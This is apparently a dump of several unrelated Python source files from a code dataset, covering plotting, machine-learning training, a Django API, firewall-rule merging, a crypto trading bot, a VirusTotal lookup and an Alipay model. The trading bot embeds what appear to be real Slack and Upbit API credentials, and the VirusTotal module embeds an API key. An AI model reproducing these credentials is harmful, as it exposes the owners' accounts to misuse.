+{"seq_id":"203237477","text":"# this script is used to plot the spectrum of omega(ky) & gamma(ky) for a given rho\n# Read some input parameter\niplotErr=root['SETTINGS']['PLOTS']['iplotErr']\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('L_Y'):\n L_Y=root['INPUTS']['GYROInput']['input.gyro']['L_Y'] # the reference ky\nelse:\n L_Y=0.3\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_GRID'):\n TOROIDAL_GRID=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_GRID'] # the reference ky\nelse:\n TOROIDAL_GRID=1\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_MIN'):\n TOROIDAL_MIN=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_MIN'] # the reference ky\nelse:\n TOROIDAL_MIN=30\nif root['INPUTS']['GYROInput']['input.gyro'].has_key('TOROIDAL_SEP'):\n TOROIDAL_SEP=root['INPUTS']['GYROInput']['input.gyro']['TOROIDAL_SEP'] # the reference ky\nelse:\n TOROIDAL_SEP=10\n\nk=root['SETTINGS']['PLOTS']['ipltspectrum']\n#wr=ones(TOROIDAL_GRID)\n#wr_err=ones(TOROIDAL_GRID)\n#wi=ones(TOROIDAL_GRID)\n#wi_err=ones(TOROIDAL_GRID)\n#for k in linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID):\nwr=root['OUTPUTSRec']['GYROOutput'][k]['wr']\nwi=root['OUTPUTSRec']['GYROOutput'][k]['wi']\nwr_err=root['OUTPUTSRec']['GYROOutput'][k]['wr_err']\nwi_err=root['OUTPUTSRec']['GYROOutput'][k]['wi_err']\n# calculate ky\nky=L_Y/TOROIDAL_MIN*(TOROIDAL_MIN+linspace(0,TOROIDAL_GRID-1,TOROIDAL_GRID)*TOROIDAL_SEP)\n#rho=root['INPUTS']['GYROInput']['input.gyro']['RADIUS']\np_tgyro=root['SETTINGS']['PLOTS']['p_tgyro']\nrho_max=root['INPUTS']['TGYROInput']['input.tgyro']['TGYRO_RMAX']\nrho_all=linspace(0,rho_max,p_tgyro+1)\nrho=rho_all[k]\nfigure(5)\nfsize=24\nsubplot(1,2,1)\n#plot(ky,wr,'-bo',linewidth=2,label='rho='+str(rho)+' $\\omega$')\nplot(ky,wr,'-bo',linewidth=2,label='$\\omega$')\nif iplotErr==1:\n plot(ky,wr_err,'-ro',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\omega$',fontsize=fsize,family='serif')\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\ntitle('rho='+str(rho))\nsubplot(1,2,2)\nplot(ky,wi,'-b*',linewidth=2,label='$\\gamma$')\nif iplotErr==1:\n plot(ky,wi_err,'-r*',linewidth=2,label='$Error$')\n legend(loc=0).draggable(True)\nxticks(fontsize=16,family='serif')\nyticks(fontsize=16,family='serif')\nxlabel('$k_y$',fontsize=fsize,family='serif')\nylabel('$\\gamma$',fontsize=fsize,family='serif')\ntitle('rho='+str(rho))\n","sub_path":"MyInte/SCRIPTS/GYRO/plotspectrum.py","file_name":"plotspectrum.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"401683634","text":"import pandas as pd\nimport numpy as np\nimport preprocessing as pre\nfrom sklearn.svm import LinearSVC\nimport time\nimport evaluatemodel as evm\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import GridSearchCV\n\nparam = {'C': [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0],\n 'class_weight': [None, 'balanced'],\n 'fit_intercept': [False, True],\n 'intercept_scaling': [0, 0.5, 1],\n 'loss': ['hinge', 'squared_hinge'],\n 'max_iter': [10000,11500, 12000, 13500, 15000],\n 'multi_class': ['ovr', 'crammer_singer'],\n 'penalty': ['l1','l2'],\n 'tol': [0.0001, 0.0005, 0.001, 0.005],\n 'verbose': [1, 2, 4, 5, 10, 20]\n }\n\n##Funções de GridSearchCV\ndef config_param(clf, param, cv = 5, n_jobs = 1, scoring = 'balanced_accuracy'):\n grid_class = GridSearchCV(clf, param, cv = cv, n_jobs = n_jobs, scoring = scoring)\n return clf, grid_class\n\ndef get_param(clf, param, X, y):\n clf, grid_class = config_param(clf, param)\n return grid_class.fit(X,y)\n\ndef best_model(clf, X, Y):\n all_param = get_param(clf, param, X, Y)\n best_result = all_param.best_estimator_\n return best_result\n\n## Aplicação das funções de gridsearch para os melhores parâmetros da máquina de vetor suporte\ndef SVMClass():\n print(\"-------------------\")\n print(\"Support Vector Machine\")\n print(\"Início do CVGrid\")\n inicio = time.time()\n clf = LinearSVC()\n XaTrain, XaTest, yaTrain, yaTest = pre.Data()\n svm_class = best_model(clf, XaTrain, yaTrain)\n clf = svm_class.fit(XaTrain, yaTrain)\n yPred = clf.predict(XaTest)\n final = time.time() - inicio\n min = final/60\n print(\"Melhores parâmetros: \")\n print(svm_class)\n print('Tempo de Execução: {} min '.format(min))\n print('Final do CVGrid')\n print(\"-------------------\")\n return XaTrain, XaTest, yaTrain, yaTest, yPred, clf\n\ndef SVMMetrics():\n print(\"-------------------\")\n print(\"Métricas Support Vector Machine\")\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n inicio = time.time()\n evm.CrossValidation(clf, XaTest, yPred)\n final = time.time() - inicio\n min = final/60\n print('Tempo de Execução: {} min '.format(min))\n print('Final das Métricas')\n print(\"-------------------\")\n\ndef PlotSVM():\n XaTrain, XaTest, yaTrain, yaTest, yPred, clf = SVMClass()\n XaTest = pd.DataFrame(XaTest)\n yPred = pd.DataFrame(yPred)\n df = pd.concat([XaTest, yaTest], axis = 1)\n df.insert(27, 'Predições', yPred.values, allow_duplicates = False)\n sns.relplot(data=df, x=\"Banda 1\", y='Nuvem Alta', hue = 'Predições')\n plt.show()\n","sub_path":"GridTotalCloud/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"484846531","text":"# coding=utf-8\nimport json\nfrom django.http.response import HttpResponse\nfrom django.db.models import CharField, Value as V\nfrom django.db.models.functions import Concat\nfrom rest_framework.views import APIView\nfrom bims.models.biological_collection_record import BiologicalCollectionRecord\nfrom sass.models import SiteVisit\n\n\nclass CollectorList(APIView):\n \"\"\"API for listing all biological collection record collectors.\"\"\"\n\n def get(self, request, *args):\n assessors = (\n SiteVisit.objects.all().exclude(\n assessor__isnull=True\n ).annotate(\n full_name=Concat(\n 'assessor__first_name', V(' '), 'assessor__last_name',\n output_field=CharField()\n )\n ).distinct('full_name').order_by(\n 'full_name'\n ).values_list('full_name', flat=True)\n )\n collectors = (\n BiologicalCollectionRecord.objects.filter(\n validated=True).exclude(\n collector__exact='').values_list(\n 'collector', flat=True).distinct(\n 'collector'\n ).order_by('collector')\n )\n all_users = list(assessors) + list(collectors)\n all_users = list(set(all_users))\n all_users.sort()\n user_index = 0\n if len(all_users) > 0:\n while all_users[user_index] == ' ':\n user_index += 1\n return HttpResponse(\n json.dumps(all_users[user_index:]),\n content_type='application/json'\n )\n","sub_path":"bims/api_views/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"200571780","text":"import pyupbit\nimport random\nimport time\nimport requests\n\ndef post_message(token, channel, text):\n response = requests.post(\"https://slack.com/api/chat.postMessage\",\n headers={\"Authorization\": \"Bearer \" + token},\n data={\"channel\": channel, \"text\": text})\n #print(response)\n\nmyToken = \"xoxb-2214036150211-2213836848130-MGOLLe5LfbVZP5h8buojkHCY\"\npost_message(myToken, \"#stock\", \"코인 자동매매 시작\")\n\n#def dbgout(message):\n# \"\"\"인자로 받은 문자열을 파이썬 셸과 슬랙으로 동시에 출력한다.\"\"\"\n# print(datetime.now().strftime('[%m/%d %H:%M:%S]'), message)\n# strbuf = datetime.now().strftime('[%m/%d %H:%M:%S] ') + message\n# post_message(myToken,\"#stock\", strbuf)\n\naccess = \"W0pBEN1VwvBvTHtp8zD2hVfgxufsv0PHzrgwCbaS\"\nsecret = \"z0iST1K4uhFwP1QKX8riwXmIPxwRsPu4xnUr9KKw\"\n\ntickers = pyupbit.get_tickers(fiat=\"KRW\") #업비트에 있는 원화코인만 검색\nrandom.shuffle(tickers) ## ticker 랜덤으로 Scan 하도록 명령.\n\n#post_message(myToken, \"#stock\", \"종목:\" + str(tickers) + \"매수 완료\")\n#post_message(myToken, \"#stock\", \"종목:\" + str(tickers) + \"매도 완료\")\n\ndef get_target_price(ticker):\n \"\"\"종목 5분봉 현재 이전 종가 가격\"\"\"\n Y_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Y_lm5_price = Y_lp_ma5['close'].rolling(5).mean()\n Y_lm5_list = Y_lm5_price.iloc[-2]\n return Y_lm5_list\n\ndef get_current_price(ticker):\n \"\"\"종목 5분봉 현재 가격\"\"\"\n Now_lp_ma5 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Now_lm5_price = Now_lp_ma5['close'].rolling(5).mean()\n Now_lm5_list = Now_lm5_price.iloc[-1]\n return Now_lm5_list\n\ndef sell_target_price(ticker):\n \"\"\"종목 5분봉 10일선 현재 가격\"\"\"\n Now_lp_ma10 = pyupbit.get_ohlcv(ticker, interval=\"minute5\")\n Now_lm10_price = Now_lp_ma10['close'].rolling(10).mean()\n Now_lm10_list = Now_lm10_price.iloc[-1]\n return Now_lm10_list\n\ndef buy_crypto_currency(ticker):\n krw = upbit.get_balance(ticker=\"KRW\") # 잔고에 남아있는 돈 얻어옴\n buy_price = pyupbit.get_current_price(ticker) #종목 현재가(매수가)\n unit = krw / float(buy_price) #원화 잔고를 최우선 매도가로 나눠서 구매 가능한 수량을 계산\n unit2 = unit - unit * 0.05 #주문 수량에서 수수료(unit * 0.015) 뺀 가격\n upbit.buy_limit_order(ticker, buy_price, unit2) #종목, 매수가, 매수 수량\n #upbit.buy_market_order(ticker, krw)\n #print(\"%s %s개 매수\" % ticker, unit)\n\ndef sell_crypto_currency(ticker):\n unit = upbit.get_balance(ticker)\n upbit.sell_market_order(ticker, unit)\n\n# 로그인\nupbit = pyupbit.Upbit(access, secret)\nprint(\"자동매매 시작\")\n\nwhile True:\n for ticker in tickers:\n target_price = get_target_price(ticker) + get_target_price(ticker) * 0.02\n current_price = get_current_price(ticker)\n sell_price = sell_target_price(ticker)\n try:\n if target_price < current_price:\n buy_crypto_currency(ticker)\n print(\"종목 :\", ticker)\n print(\"매수 완료\")\n post_message(myToken, \"#stock\", \"종목:\" + str(ticker) + \"매수 완료\")\n else:\n if current_price < sell_price:\n sell_crypto_currency(ticker)\n print(\"종목 :\", ticker)\n print(\"매도 완료\")\n post_message(myToken, \"#stock\", \"종목:\" + str(ticker) + \"매도 완료\")\n except:\n time.sleep(0.5)\n time.sleep(1)\n print(\"-----------------------잠시 대기 중-----------------------\")\n #post_message(myToken, \"#stock\", \"잠시 대기 중\")\n","sub_path":"Upbit_auto.py","file_name":"Upbit_auto.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"418447651","text":"# -*-coding: utf-8 -*-\n\nfrom __future__ import absolute_import, division, print_function\n\nimport tensorflow as tf\n\nfrom libs.models.detectors.single_stage_base_network import DetectionNetworkBase\nfrom libs.models.losses.losses import Loss\nfrom libs.utils import bbox_transform, nms_rotate\nfrom libs.utils.coordinate_convert import coordinate_present_convert\nfrom libs.models.samplers.retinanet.anchor_sampler_retinenet import AnchorSamplerRetinaNet\n\n\nclass DetectionNetworkRetinaNet(DetectionNetworkBase):\n\n def __init__(self, cfgs, is_training):\n super(DetectionNetworkRetinaNet, self).__init__(cfgs, is_training)\n self.anchor_sampler_retinenet = AnchorSamplerRetinaNet(cfgs)\n self.losses = Loss(self.cfgs)\n\n def build_whole_detection_network(self, input_img_batch, gtboxes_batch_h=None, gtboxes_batch_r=None, gpu_id=0):\n\n if self.is_training:\n gtboxes_batch_h = tf.reshape(gtboxes_batch_h, [-1, 5])\n gtboxes_batch_h = tf.cast(gtboxes_batch_h, tf.float32)\n\n gtboxes_batch_r = tf.reshape(gtboxes_batch_r, [-1, 6])\n gtboxes_batch_r = tf.cast(gtboxes_batch_r, tf.float32)\n\n if self.cfgs.USE_GN:\n input_img_batch = tf.reshape(input_img_batch, [1, self.cfgs.IMG_SHORT_SIDE_LEN,\n self.cfgs.IMG_MAX_LENGTH, 3])\n\n # 1. build backbone\n feature_pyramid = self.build_backbone(input_img_batch)\n\n # 2. build rpn\n rpn_box_pred_list, rpn_cls_score_list, rpn_cls_prob_list = self.rpn_net(feature_pyramid, 'rpn_net')\n rpn_box_pred = tf.concat(rpn_box_pred_list, axis=0)\n rpn_cls_score = tf.concat(rpn_cls_score_list, axis=0)\n rpn_cls_prob = tf.concat(rpn_cls_prob_list, axis=0)\n\n # 3. generate anchors\n anchor_list = self.make_anchors(feature_pyramid)\n anchors = tf.concat(anchor_list, axis=0)\n\n # 4. build loss\n if self.is_training:\n with tf.variable_scope('build_loss'):\n labels, target_delta, anchor_states, target_boxes = tf.py_func(func=self.anchor_sampler_retinenet.anchor_target_layer,\n inp=[gtboxes_batch_h,\n gtboxes_batch_r, anchors, gpu_id],\n Tout=[tf.float32, tf.float32, tf.float32,\n tf.float32])\n\n if self.method == 'H':\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 0)\n else:\n self.add_anchor_img_smry(input_img_batch, anchors, anchor_states, 1)\n\n cls_loss = self.losses.focal_loss(labels, rpn_cls_score, anchor_states)\n\n if self.cfgs.REG_LOSS_MODE == 0:\n reg_loss = self.losses.iou_smooth_l1_loss_log(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors)\n elif self.cfgs.REG_LOSS_MODE == 1:\n reg_loss = self.losses.iou_smooth_l1_loss_exp(target_delta, rpn_box_pred, anchor_states,\n target_boxes, anchors, alpha=self.cfgs.ALPHA,\n beta=self.cfgs.BETA)\n else:\n reg_loss = self.losses.smooth_l1_loss(target_delta, rpn_box_pred, anchor_states)\n\n self.losses_dict['cls_loss'] = cls_loss * self.cfgs.CLS_WEIGHT\n self.losses_dict['reg_loss'] = reg_loss * self.cfgs.REG_WEIGHT\n\n # 5. 
postprocess\n with tf.variable_scope('postprocess_detctions'):\n boxes, scores, category = self.postprocess_detctions(rpn_bbox_pred=rpn_box_pred,\n rpn_cls_prob=rpn_cls_prob,\n anchors=anchors)\n boxes = tf.stop_gradient(boxes)\n scores = tf.stop_gradient(scores)\n category = tf.stop_gradient(category)\n\n if self.is_training:\n return boxes, scores, category, self.losses_dict\n else:\n return boxes, scores, category\n\n def postprocess_detctions(self, rpn_bbox_pred, rpn_cls_prob, anchors):\n\n return_boxes_pred = []\n return_scores = []\n return_labels = []\n for j in range(0, self.cfgs.CLASS_NUM):\n scores = rpn_cls_prob[:, j]\n if self.is_training:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.VIS_SCORE)), [-1, ])\n else:\n indices = tf.reshape(tf.where(tf.greater(scores, self.cfgs.FILTERED_SCORE)), [-1, ])\n\n anchors_ = tf.gather(anchors, indices)\n rpn_bbox_pred_ = tf.gather(rpn_bbox_pred, indices)\n scores = tf.gather(scores, indices)\n\n if self.method == 'H':\n x_c = (anchors_[:, 2] + anchors_[:, 0]) / 2\n y_c = (anchors_[:, 3] + anchors_[:, 1]) / 2\n h = anchors_[:, 2] - anchors_[:, 0] + 1\n w = anchors_[:, 3] - anchors_[:, 1] + 1\n theta = -90 * tf.ones_like(x_c)\n anchors_ = tf.transpose(tf.stack([x_c, y_c, w, h, theta]))\n\n if self.cfgs.ANGLE_RANGE == 180:\n anchors_ = tf.py_func(coordinate_present_convert,\n inp=[anchors_, -1],\n Tout=[tf.float32])\n anchors_ = tf.reshape(anchors_, [-1, 5])\n\n boxes_pred = bbox_transform.rbbox_transform_inv(boxes=anchors_, deltas=rpn_bbox_pred_)\n\n if self.cfgs.ANGLE_RANGE == 180:\n _, _, _, _, theta = tf.unstack(boxes_pred, axis=1)\n indx = tf.reshape(tf.where(tf.logical_and(tf.less(theta, 0), tf.greater_equal(theta, -180))), [-1, ])\n boxes_pred = tf.gather(boxes_pred, indx)\n scores = tf.gather(scores, indx)\n\n boxes_pred = tf.py_func(coordinate_present_convert,\n inp=[boxes_pred, 1],\n Tout=[tf.float32])\n boxes_pred = tf.reshape(boxes_pred, [-1, 5])\n\n nms_indices = nms_rotate.nms_rotate(decode_boxes=boxes_pred,\n scores=scores,\n iou_threshold=self.cfgs.NMS_IOU_THRESHOLD,\n max_output_size=100 if self.is_training else 1000,\n use_gpu=False)\n\n tmp_boxes_pred = tf.reshape(tf.gather(boxes_pred, nms_indices), [-1, 5])\n tmp_scores = tf.reshape(tf.gather(scores, nms_indices), [-1, ])\n\n return_boxes_pred.append(tmp_boxes_pred)\n return_scores.append(tmp_scores)\n return_labels.append(tf.ones_like(tmp_scores) * (j + 1))\n\n return_boxes_pred = tf.concat(return_boxes_pred, axis=0)\n return_scores = tf.concat(return_scores, axis=0)\n return_labels = tf.concat(return_labels, axis=0)\n\n return return_boxes_pred, return_scores, return_labels\n","sub_path":"libs/models/detectors/retinenet/build_whole_network.py","file_name":"build_whole_network.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"334857653","text":"import time\nfrom typing import List, Tuple\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchtext.data as tt\nfrom sklearn.metrics import confusion_matrix\n\nfrom q3_model import RNNPOSTagger\nfrom tools import print_cm, load_ud_pos_data, EarlyStopping\n\n\ndef train(model: RNNPOSTagger, train_iter: tt.Iterator, val_iter: tt.Iterator,\n optimizer: optim.Optimizer, criterion: nn.Module, epochs: int,\n short_train: bool = False, patience: int = 3):\n \"\"\"\n Trains a model.\n\n :param model: The model to train\n :param train_iter: The training iterator\n :param val_iter: The validation iterator\n :param optimizer: The optimizer\n :param criterion: The loss function\n :param epochs: The number of epochs to train for\n :param short_train: If True, only train every 20 batches\n :param patience: The max # of loss-increasing epochs before early stopping \n :return: None\n \"\"\"\n early_stopping = EarlyStopping(patience=patience, verbose=False, filename='q3_checkpoint.pt')\n for epoch in range(epochs):\n start_time = time.time()\n epoch_loss = 0.\n total_batches = 0\n for batch_idx, batch in enumerate(train_iter):\n if short_train and batch_idx % 20 != 0:\n continue\n\n # Forward pass\n optimizer.zero_grad()\n output, _ = model.forward(batch.text)\n batch_loss = 0.\n for i in range(output.size()[0]):\n batch_loss += criterion(output[i, :, :].squeeze(),\n batch.udtags[i, :].squeeze())\n\n # Backward pass\n batch_loss.backward(retain_graph=True)\n optimizer.step()\n\n # Record the total loss\n epoch_loss += batch_loss\n total_batches += 1\n\n # Finish training, print status to stdout\n duration = (time.time() - start_time)\n accuracy, unk_accuracy, val_loss = evaluate(model, val_iter, criterion)\n print(\"Epoch %d\" % epoch, end=\": \")\n print(\"loss per batch = %.4f\" % (epoch_loss / total_batches), end=\", \")\n print(\"val loss = %.4f\" % val_loss, end=\", \")\n print(\"val acc = %.4f\" % accuracy, end=\", \")\n print(\"unk acc = %.4f\" % unk_accuracy, end=\" \")\n print(\"(%.3f sec)\" % duration)\n early_stopping(val_loss, model)\n if early_stopping.early_stop:\n print(\"Early stopping, reloading checkpoint model\")\n model.load_state_dict(torch.load('q3_checkpoint.pt'))\n break\n\ndef eval_sent(model: RNNPOSTagger, sentence_list: List[str]) -> \\\n List[List[str]]:\n \"\"\"\n Runs the model on a list of sentences.\n\n :param model: The model to run\n :param sentence_list: A list of input sentences that the model will\n tag. Each sentence is a string of words separated by spaces. 
See\n the script at the bottom for an example\n :return: The POS tags of each sentence in sentence_list\n \"\"\"\n predictions = []\n sentences = [model.text_field.tokenize(s) for s in sentence_list]\n indices = model.text_field.process(sentences)\n model_output = model.forward(indices)[0].argmax(2)\n for i in range(len(sentences)):\n predictions.append([model.tag_field.vocab.itos[j]\n for j in model_output[1:-1, i]])\n\n return predictions\n\n\ndef evaluate(model: RNNPOSTagger, eval_iter: tt.Iterator, criterion: nn.Module,\n conf_matrix: bool = False) -> Tuple[float, float]:\n \"\"\"\n Evaluates a model.\n\n :param model: The model to evaluate\n :param eval_iter: The testing or validation iterator\n :param conf_matrix: If true, a confusion matrix will be printed to\n stdout\n :return: The model's accuracy on the provided dataset\n \"\"\"\n pad_token = model.tag_field.pad_token\n bos_token = model.tag_field.init_token\n eos_token = model.tag_field.eos_token\n unk_token = model.text_field.unk_token\n\n pad_index = model.tag_field.vocab.stoi[pad_token]\n bos_index = model.tag_field.vocab.stoi[bos_token]\n eos_index = model.tag_field.vocab.stoi[eos_token]\n unk_index = model.text_field.vocab.stoi[unk_token]\n\n pads, correct, tries, unks, unk_correct, loss = 0., 0., 0., 0., 0., 0.\n pred_list, target_list = np.array([]), np.array([])\n for i, batch in enumerate(eval_iter):\n sentence_length, batch_size = batch.text.size()\n\n # Mask out , , and \n pad_mask = (batch.udtags == pad_index)\n bos_mask = (batch.udtags == bos_index)\n eos_mask = (batch.udtags == eos_index)\n other_mask = pad_mask | bos_mask | eos_mask\n others = torch.sum(other_mask)\n\n # Count the number of \n unk_mask = (batch.text == unk_index)\n unks += torch.sum(unk_mask)\n\n # Count the total number of words evaluated\n tries += (sentence_length * batch_size) - others\n\n # Compute model output\n \n y_hat, _ = model.forward(batch.text)\n model_output = y_hat.argmax(2)\n\n #compute batch loss \n for i in range(sentence_length):\n loss += criterion(y_hat[i,:,:].squeeze(), batch.udtags[i,:].squeeze())\n\n target_list = np.concatenate((target_list,\n batch.udtags.view(-1).numpy()))\n pred_list = np.concatenate((pred_list, model_output.view(-1).numpy()))\n\n # Count correct predictions\n correct_mask = (batch.udtags == model_output) & ~other_mask\n correct += torch.sum(correct_mask)\n unk_correct += torch.sum(unk_mask & correct_mask)\n\n # Compute accuracy\n accuracy = correct / tries\n unk_accuracy = unk_correct / unks\n\n # Display a confusion matrix\n if conf_matrix:\n target_list = [model.tag_field.vocab.itos[int(target)]\n for target in target_list]\n pred_list = [model.tag_field.vocab.itos[int(pred)]\n for pred in pred_list]\n cm = confusion_matrix(target_list, pred_list,\n labels=model.tag_field.vocab.itos)\n print_cm(cm, model.tag_field.vocab.itos)\n\n return accuracy.item(), unk_accuracy.item(), (loss.item() / i)\n\n\nif __name__ == \"__main__\":\n # Problem 3d: Use this script to test your code.\n # My results for the hyperparameter tuning are in a separate text file.\n train_iter, val_iter, test_iter, text_field, tag_field = \\\n load_ud_pos_data(10, min_freq=2)\n\n # Set up the model\n tagger = RNNPOSTagger(text_field, tag_field, 20, 10, bidir=False)\n pad_token = tag_field.pad_token\n pad_index = tag_field.vocab.stoi[pad_token]\n criterion = nn.CrossEntropyLoss(ignore_index=pad_index)\n optimizer = optim.Adam(tagger.parameters(), lr=1e-3)\n\n # Train the model\n train(tagger, train_iter, val_iter, optimizer, 
criterion, 40,\n short_train=True)\n\n # Test the model\n sent = [\"if you push it , it will never work .\"]\n print(sent[0], \"POS tags:\", ' '.join(eval_sent(tagger, sent)[0]))\n print(\"test set acc = %.4f, test set unk acc = %.4f, test set loss = %.4f\" %\n evaluate(tagger, test_iter, criterion))\n","sub_path":"RNN Part of Speech Tagger/q3_classifier.py","file_name":"q3_classifier.py","file_ext":"py","file_size_in_byte":7166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"405515886","text":"# -*- coding: utf-8 -*-\nimport csv\nfrom DefAttri import Rule, printRules, printSortRules\n\nif __name__ == \"__main__\":\n Rules = set()\n ResultRules = set()\n MergeFlag = False\n #读取文件\n print(\"Loading syslog, pleasing waiting ...\\n\")\n with open('yixiao-tcp.csv', 'r', encoding='UTF-8') as csvfile:\n reader = csv.reader(csvfile, dialect='excel', delimiter=\",\")\n for i, rows in enumerate(reader):\n src1 = rows[0].encode('utf-8').decode('utf-8-sig') # 去掉\\ufeff\n dest1 = rows[1].encode('utf-8').decode('utf-8-sig')\n port1 = rows[2].encode('utf-8').decode('utf-8-sig')\n count = int(rows[3].encode('utf-8').decode('utf-8-sig'))\n temprule = Rule(src1, dest1, port1, count)\n Rules.add(temprule)\n print('加载第 %d 条日志,请等待...'%i)\n # Rules.add(Rule(src1,dest1,port1))\n # temprule = Rule(rows[0],rows[1],rows[2])\n\n #RULES 自合并\n i = len(Rules) #以rule的里面的规则数为计数\n while len(Rules) != 0:\n temprule = Rules.pop() #先找一条出来\n i -= 1 #计数器要相应的减1\n print(\"Raw Rules are %d Results are %d\\n\"%(len(Rules), len(ResultRules)))\n for rule in Rules: #开始循环\n if temprule.MergeRule(rule): #开始合并\n Rules.discard(rule) #合并成功,则删掉此规则\n MergeFlag = True #合并成功标志\n i = i-1 #rule的数量减少1条,合并的规则送回去继续合并\n break #跳出当前循环,进行set规则清理\n if not MergeFlag: #如果没有合并成功,说明这条规则是单独的, 送回最终的规则库里\n ResultRules.add(temprule)\n else:\n Rules.add(temprule) #有合并成功的,则继续需要合并\n i += 1 # 加回去的,计数器要加1\n MergeFlag = False #再次的合并成功的标志\n\n # print('整理IP中,大约需要15分钟,请等待...')\n # j = 1\n # for i in ResultRules:\n # print('整理第 %d 条,请等待'%j)\n # i.ConvertIP()\n # j += 1\n\n\n # #规则输出到文件 规则输出到文件 规则输出到文件 规则输出到文件\n # print(\"结果输出到文件中,请等待...\")\n # ruletxt = open('Rules.txt', 'w')\n # rawtxt = open('rawRules.txt', 'w')\n # printRules(ruletxt, rawtxt, ResultRules)\n # ruletxt.close()\n # rawtxt.close()\n\n\n\n # 按照rulePort 类型,即服务类型输出到文件\n print(\"结果输出到文件中,请等待...\")\n rawtxt = open('sortRules.txt', 'w')\n printSortRules(rawtxt, ResultRules)\n rawtxt.close()\n print(\"执行完成,结束。\")\n","sub_path":"MakeRule.py","file_name":"MakeRule.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"81571909","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nex/projects/snoopdroid/snoopdroid/virustotal.py\n# Compiled at: 2020-04-03 08:08:14\n# Size of source mod 2**32: 3192 bytes\nimport time, requests\nfrom halo import Halo\nfrom terminaltables import AsciiTable\nfrom .ui import info, highlight, red\n\ndef get_virustotal_report(hashes):\n apikey = '233f22e200ca5822bd91103043ccac138b910db79f29af5616a9afe8b6f215ad'\n url = 'https://www.virustotal.com/partners/sysinternals/file-reports?apikey={}'.format(apikey)\n items = []\n for sha256 in hashes:\n items.append({'hash':sha256, \n 'image_path':'unknown', \n 'creation_datetime':'unknown'})\n else:\n headers = {'User-Agent':'VirusTotal', \n 'Content-Type':'application/json'}\n res = requests.post(url, headers=headers, json=items)\n if res.status_code == 200:\n report = res.json()\n return report['data']\n\n\ndef virustotal_lookup(packages):\n print(info('Looking up all extracted files on ' + highlight('VirusTotal') + ' (www.virustotal.com).'))\n print('')\n detections = {}\n\n def virustotal_query(batch):\n report = get_virustotal_report(batch)\n if report:\n for entry in report:\n if entry['hash'] not in detections and entry['found'] == True:\n detections[entry['hash']] = entry['detection_ratio']\n\n with Halo(text='', spinner='bouncingBar') as (spinner):\n batch = []\n for package in packages:\n for file in package.files:\n batch.append(file['sha256'])\n if len(batch) == 25:\n spinner.text = 'Looking up first 25 apps...'\n virustotal_query(batch)\n batch = []\n\n else:\n if batch:\n spinner.text = 'Looking up remaining files...'\n virustotal_query(batch)\n spinner.succeed('Completed!')\n\n table_data = []\n table_data.append(['Package name', 'File path', 'Detections'])\n for package in packages:\n for file in package.files:\n row = [\n package.name, file['stored_path']]\n if file['sha256'] in detections:\n detection = detections[file['sha256']]\n positives = detection.split('/')[0]\n if int(positives) > 0:\n row.append(red(detection))\n else:\n row.append(detection)\n else:\n row.append('not found')\n table_data.append(row)\n else:\n print('')\n table = AsciiTable(table_data)\n print(table.table)","sub_path":"pycfiles/snoopdroid-2.3-py3-none-any/virustotal.cpython-38.py","file_name":"virustotal.cpython-38.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"593819307","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass MybankPaymentTradeBusinessOperateQueryModel(object):\n\n def __init__(self):\n self._order_no = None\n self._request_no = None\n\n @property\n def order_no(self):\n return self._order_no\n\n @order_no.setter\n def order_no(self, value):\n self._order_no = value\n @property\n def request_no(self):\n return self._request_no\n\n @request_no.setter\n def request_no(self, value):\n self._request_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.order_no:\n if hasattr(self.order_no, 'to_alipay_dict'):\n params['order_no'] = self.order_no.to_alipay_dict()\n else:\n params['order_no'] = self.order_no\n if self.request_no:\n if hasattr(self.request_no, 'to_alipay_dict'):\n params['request_no'] = self.request_no.to_alipay_dict()\n else:\n params['request_no'] = self.request_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = MybankPaymentTradeBusinessOperateQueryModel()\n if 'order_no' in d:\n o.order_no = d['order_no']\n if 'request_no' in d:\n o.request_no = 